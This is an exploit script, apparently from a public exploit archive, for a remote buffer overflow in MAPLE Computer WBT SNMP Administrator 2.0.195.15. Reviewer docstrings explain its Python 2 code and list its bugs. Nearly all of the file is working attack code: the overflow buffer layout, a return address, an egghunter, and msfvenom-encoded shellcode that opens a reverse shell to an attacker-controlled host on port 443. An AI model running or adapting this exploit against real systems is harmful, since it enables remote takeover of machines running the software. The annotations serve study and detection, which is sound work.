# Exploit Title: MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)
# Author: sasaga92
# Discovery Date: 2019-07-18
# Vendor Homepage: www.computerlab.com
# Software Link: https://www.computerlab.com/index.php/downloads/category/27-device-manager
# Software Link: ftp://downloads.computerlab.com/software/SnmpSetup.195.15.EXE
# Tested on OS: Windows XP SP2 x86
# CVE: N/A
# [+] Credits: John Page (aka hyp3rlinx)

#!/usr/bin/python
# NOTE(review): Python 2 script (print statements, string.lowercase); it does
# not run under Python 3 as written.  `sys` and `struct` are imported but
# never used below.
import sys
import socket
import random
import string
import struct


def pattern_create(_type,_length):
    """Return a filler string of `_length` characters.

    `_type` is a space-separated selector:
      "trash X"  -> the single character/word X repeated `_length` times
                    (a negative `_length` yields '').
      "random"   -> `_length` lowercase letters from `string.lowercase`
                    (Python 2 only; `random` is not a CSPRNG, which is fine
                    for filler).
      "pattern"  -> the cyclic "Aa0Aa1Aa2..." sequence, built three
                    characters at a time.
    Any other selector returns the literal string "Not Found".

    NOTE(review): "trash" with no second word raises IndexError, and the
    "pattern" loop never terminates for a negative `_length`, because it
    compares with `!=` rather than `<`.
    """
    _type = _type.split(" ")
    if _type[0] == "trash":
        return _type[1] * _length
    elif _type[0] == "random":
        return ''.join(random.choice(string.lowercase) for i in range(_length))
    elif _type[0] == "pattern":
        _pattern = ''
        # Three rolling counters: upper letter, lower letter, digit.
        _parts = ['A', 'a', '0']
        while len(_pattern) != _length:
            _pattern += _parts[len(_pattern) % 3]
            # After each complete triple, advance the digit; carry into the
            # lower letter, then the upper letter, wrapping each at its end.
            if len(_pattern) % 3 == 0:
                _parts[2] = chr(ord(_parts[2]) + 1)
                if _parts[2] > '9':
                    _parts[2] = '0'
                    _parts[1] = chr(ord(_parts[1]) + 1)
                    if _parts[1] > 'z':
                        _parts[1] = 'a'
                        _parts[0] = chr(ord(_parts[0]) + 1)
                        if _parts[0] > 'Z':
                            _parts[0] = 'A'
        return _pattern
    else:
        return "Not Found"


def pwned(_host, _port, _payload):
    """Send `_payload` (plus a trailing CRLF CRLF) to `_host`:`_port` over TCP.

    Reads at most 1024 bytes back and prints them with repr().  There is no
    timeout on the socket, so a server that never answers blocks recv()
    indefinitely.  Status messages are printed in Spanish.

    NOTE(review): `s.shutdown` and `s.close` below are bare attribute
    references, not calls -- the socket is never shut down or closed
    explicitly and is only released when the object is garbage-collected.

    NOTE(review): the final message claims the payload "ejecutado", but
    nothing here checks `_data`; success is asserted, not verified.  The
    byte count it reports includes the four appended "\r\n\r\n" bytes.
    """
    print "[*] Conectandose a {0}:{1}...".format(_host, _port)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((_host, _port))
    print "[*] Conectado, Enviando payload {0} bytes...".format(len(_payload))
    _payload = "{0}\r\n\r\n".format(_payload)
    s.send(_payload)
    _data = s.recv(1024)
    s.shutdown
    s.close
    print 'Recibido:', repr(_data)
    print "[+] Payload de {0} bytes Enviado, Satisfactoriamente su payload ejecutado.".format(len(_payload))


def main():
    """Build the oversized request buffer and hand it to pwned().

    Target host/port and the two size constants are hard-coded.  The buffer
    laid out below is, in order: 'A' filler, the 8-byte tag "w00tw00t", the
    msfvenom shellcode, the 32-byte egghunter, 'B' filler up to
    `_offset_eip` (642200 bytes), then the 4-byte `_eip` value -- roughly
    642 KB of mostly repeated 'A'/'B' bytes on the wire.

    Detection note: a request of this size consisting almost entirely of a
    repeated single byte, containing the literal "w00tw00t" tag, is trivially
    distinguishable from legitimate traffic by a length check or an IDS
    signature.
    """
    _host = "192.168.0.12"
    _port = 987
    _offset_eip = 642200
    _padding = 642144
    _eip = "\xc3\x78\xd7\x5a" #call ebx 0x5AD778C3
    _tag = "w00tw00t"
    #msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.11 LPORT=443 -e x86/alpha_mixed -f c
    _shellcode = ("\x89\xe6\xda\xd8\xd9\x76\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
                  "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
                  "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
                  "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
                  "\x39\x6c\x39\x78\x6c\x42\x53\x30\x73\x30\x35\x50\x35\x30\x4d"
                  "\x59\x78\x65\x30\x31\x4b\x70\x51\x74\x6e\x6b\x36\x30\x54\x70"
                  "\x4e\x6b\x33\x62\x74\x4c\x4e\x6b\x30\x52\x52\x34\x4c\x4b\x44"
                  "\x32\x45\x78\x46\x6f\x6c\x77\x33\x7a\x31\x36\x64\x71\x6b\x4f"
                  "\x6e\x4c\x65\x6c\x30\x61\x73\x4c\x74\x42\x46\x4c\x67\x50\x59"
                  "\x51\x68\x4f\x36\x6d\x76\x61\x7a\x67\x59\x72\x4c\x32\x51\x42"
                  "\x32\x77\x4e\x6b\x33\x62\x36\x70\x6e\x6b\x52\x6a\x47\x4c\x4e"
                  "\x6b\x42\x6c\x76\x71\x61\x68\x5a\x43\x52\x68\x33\x31\x58\x51"
                  "\x63\x61\x6c\x4b\x52\x79\x45\x70\x57\x71\x79\x43\x4c\x4b\x53"
                  "\x79\x62\x38\x4b\x53\x44\x7a\x37\x39\x4c\x4b\x66\x54\x4c\x4b"
                  "\x47\x71\x38\x56\x76\x51\x49\x6f\x6e\x4c\x7a\x61\x78\x4f\x34"
                  "\x4d\x76\x61\x5a\x67\x56\x58\x79\x70\x33\x45\x49\x66\x66\x63"
                  "\x51\x6d\x69\x68\x65\x6b\x73\x4d\x66\x44\x64\x35\x5a\x44\x50"
                  "\x58\x4e\x6b\x30\x58\x37\x54\x47\x71\x59\x43\x63\x56\x6e\x6b"
                  "\x44\x4c\x50\x4b\x4c\x4b\x46\x38\x75\x4c\x43\x31\x69\x43\x4e"
                  "\x6b\x44\x44\x6c\x4b\x45\x51\x38\x50\x4d\x59\x57\x34\x36\x44"
                  "\x51\x34\x51\x4b\x53\x6b\x33\x51\x71\x49\x53\x6a\x76\x31\x6b"
                  "\x4f\x69\x70\x61\x4f\x63\x6f\x53\x6a\x6e\x6b\x62\x32\x58\x6b"
                  "\x6e\x6d\x61\x4d\x75\x38\x55\x63\x37\x42\x53\x30\x77\x70\x52"
                  "\x48\x54\x37\x74\x33\x57\x42\x71\x4f\x32\x74\x50\x68\x62\x6c"
                  "\x51\x67\x36\x46\x56\x67\x6e\x69\x59\x78\x6b\x4f\x4e\x30\x6e"
                  "\x58\x4e\x70\x73\x31\x55\x50\x53\x30\x56\x49\x48\x44\x53\x64"
                  "\x66\x30\x45\x38\x76\x49\x6f\x70\x32\x4b\x33\x30\x79\x6f\x4e"
                  "\x35\x43\x5a\x57\x7a\x31\x78\x6b\x70\x4f\x58\x75\x50\x76\x6b"
                  "\x33\x58\x75\x52\x65\x50\x43\x31\x6d\x6b\x6c\x49\x48\x66\x72"
                  "\x70\x76\x30\x76\x30\x66\x30\x43\x70\x46\x30\x61\x50\x72\x70"
                  "\x32\x48\x6b\x5a\x56\x6f\x69\x4f\x4b\x50\x69\x6f\x48\x55\x7a"
                  "\x37\x43\x5a\x56\x70\x31\x46\x36\x37\x43\x58\x6e\x79\x6e\x45"
                  "\x42\x54\x51\x71\x4b\x4f\x39\x45\x4e\x65\x4b\x70\x43\x44\x46"
                  "\x6a\x39\x6f\x70\x4e\x45\x58\x50\x75\x38\x6c\x49\x78\x33\x57"
                  "\x35\x50\x35\x50\x73\x30\x32\x4a\x45\x50\x71\x7a\x64\x44\x31"
                  "\x46\x50\x57\x42\x48\x64\x42\x78\x59\x4a\x68\x73\x6f\x49\x6f"
                  "\x49\x45\x4d\x53\x48\x78\x73\x30\x71\x6e\x77\x46\x6e\x6b\x75"
                  "\x66\x73\x5a\x57\x30\x73\x58\x67\x70\x34\x50\x47\x70\x47\x70"
                  "\x46\x36\x70\x6a\x37\x70\x50\x68\x51\x48\x69\x34\x76\x33\x78"
                  "\x65\x39\x6f\x79\x45\x5a\x33\x76\x33\x51\x7a\x55\x50\x66\x36"
                  "\x71\x43\x52\x77\x31\x78\x56\x62\x78\x59\x6f\x38\x53\x6f\x49"
                  "\x6f\x79\x45\x4e\x63\x58\x78\x45\x50\x71\x6d\x64\x68\x70\x58"
                  "\x61\x78\x33\x30\x51\x50\x43\x30\x47\x70\x53\x5a\x53\x30\x70"
                  "\x50\x51\x78\x64\x4b\x36\x4f\x44\x4f\x50\x30\x69\x6f\x58\x55"
                  "\x31\x47\x31\x78\x54\x35\x52\x4e\x62\x6d\x35\x31\x49\x6f\x7a"
                  "\x75\x31\x4e\x51\x4e\x4b\x4f\x64\x4c\x46\x44\x76\x6f\x6e\x65"
                  "\x54\x30\x59\x6f\x79\x6f\x4b\x4f\x6b\x59\x4f\x6b\x69\x6f\x79"
                  "\x6f\x39\x6f\x37\x71\x48\x43\x51\x39\x4f\x36\x74\x35\x6f\x31"
                  "\x58\x43\x4f\x4b\x78\x70\x58\x35\x6e\x42\x43\x66\x70\x6a\x37"
                  "\x70\x73\x63\x69\x6f\x59\x45\x41\x41")
    # 32-byte egghunter; it searches for the 8-byte `_tag` placed in front
    # of the shellcode above (the tag string is "w00t" written twice).
    _egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
    # 'A' filler sized so that tag + shellcode end exactly at `_padding`.
    _inject =pattern_create("trash A", _padding-len(_tag)-len(_shellcode))
    _inject += _tag
    _inject += _shellcode
    _inject += _egghunter
    # 'B' filler from the end of the egghunter up to `_offset_eip`.
    _inject +=pattern_create("trash B", _offset_eip-len(_inject))
    _inject += _eip
    # Echoes the entire ~642 KB buffer (binary included) to stdout before
    # sending it; noisy in a terminal and in any captured logs.
    print(_inject)
    pwned(_host,_port,_inject)


if __name__ == "__main__":
    main()